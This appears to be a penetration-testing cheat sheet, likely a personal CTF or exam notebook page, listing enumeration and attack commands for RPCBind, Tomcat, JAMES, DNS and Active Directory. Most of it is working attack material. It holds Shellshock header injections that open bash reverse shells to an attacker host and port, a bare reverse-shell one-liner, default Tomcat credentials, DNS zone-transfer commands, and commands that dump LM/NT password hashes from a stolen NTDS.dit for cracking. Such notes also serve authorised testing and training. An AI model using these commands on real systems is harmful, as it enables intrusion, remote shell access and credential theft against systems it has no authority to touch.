Other Services Enumeration

RPCBind Port 111

rpcinfo -p x.x.x.x

Apache Tomcat Port 8080

default credentials: tomcat / s3cret

Port 4555

JAMES Remote Administration Tool 2.3.2

Shellshock Vulnerability

curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x ip:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ip/1234 0>&1" ip/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
python shellshock.py payload=reverse rhost=ip lhost=ip lport=4444 pages=/cgi-bin/user.sh
https://www.exploit-db.com/exploits/34900
bash -i >& /dev/tcp/ip/8888 0>&1

Shellshock Vulnerability
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/ip/1234 0>&1 " http://ip:80/cgi-bin/user.sh

Port 53

dnsrecon -r 127.0.0.0/24 -n ip
dig axfr @ip
dig axfr bank.htb @ip

DNS Zone Transfer

nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

Active Directory / LDAP

./dsusers.py datatable link_table extract --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john --syshive 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

 /usr/local/bin/esedbexport -m tables 20170721114636_default_192.x.x.x 33_psexec.ntdsgrab._333512.dit

Last updated 4 years ago